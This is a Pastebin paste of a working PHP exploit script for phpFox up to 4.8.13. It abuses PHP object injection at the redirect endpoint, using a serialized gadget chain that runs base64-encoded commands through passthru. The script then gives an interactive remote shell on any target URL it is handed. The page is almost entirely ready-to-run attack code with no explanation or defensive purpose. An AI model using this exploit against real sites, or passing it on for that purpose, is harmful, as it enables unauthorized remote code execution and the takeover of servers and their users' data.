FlyFar

phpFox < 4.8.13 - (redirect) PHP Object Injection Exploit

Feb 22nd, 2024
61
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.62 KB | Cybersecurity | 0 0
  1. <?php
  2.  
  3.  
  4. set_time_limit(0);
  5. error_reporting(E_ERROR);
  6.  
  7. if (!extension_loaded("curl")) die("[+] cURL extension required!\n");
  8.  
  9. print "+------------------------------------------------------------------+\n";
  10. print "| phpFox <= 4.8.13 (redirect) PHP Object Injection Exploit by EgiX |\n";
  11. print "+------------------------------------------------------------------+\n";
  12.  
  13. if ($argc != 2) die("\nUsage: php $argv[0] <URL>\n\n");
  14.  
  15. function encode($string)
  16. {
  17.         $string = addslashes(gzcompress($string, 9));
  18.         return urlencode(strtr(base64_encode($string), '+/=', '-_,'));
  19. }
  20.  
  21. class Phpfox_Request
  22. {
  23.     private $_sName = "EgiX";
  24.     private $_sPluginRequestGet = "print '_____'; passthru(base64_decode(\$_SERVER['HTTP_CMD'])); print '_____'; die;";
  25. }
  26.  
  27. class Core_Objectify
  28. {
  29.     private $__toString;
  30.    
  31.     function __construct($callback)
  32.     {
  33.         $this->__toString = $callback;
  34.     }
  35. }
  36.  
  37. print "\n[+] Launching shell on {$argv[1]}\n";
  38.  
  39. $popChain = serialize(new Core_Objectify([new Phpfox_Request, "get"]));
  40. $popChain = str_replace('Core_Objectify', 'Core\Objectify', $popChain);
  41.  
  42. $ch = curl_init();
  43.  
  44. curl_setopt($ch, CURLOPT_URL, "{$argv[1]}index.php/core/redirect");
  45. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  46. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  47. curl_setopt($ch, CURLOPT_POSTFIELDS, "url=".encode($popChain));
  48.  
  49. while(1)
  50. {
  51.     print "\nphpFox-shell# ";
  52.     if (($cmd = trim(fgets(STDIN))) == "exit") break;
  53.     curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".base64_encode($cmd)]);
  54.     preg_match("/_____(.*)_____/s", curl_exec($ch), $m) ? print $m[1] : die("\n[+] Exploit failed!\n");
  55. }
  56.            
Add Comment
Please, Sign In to add comment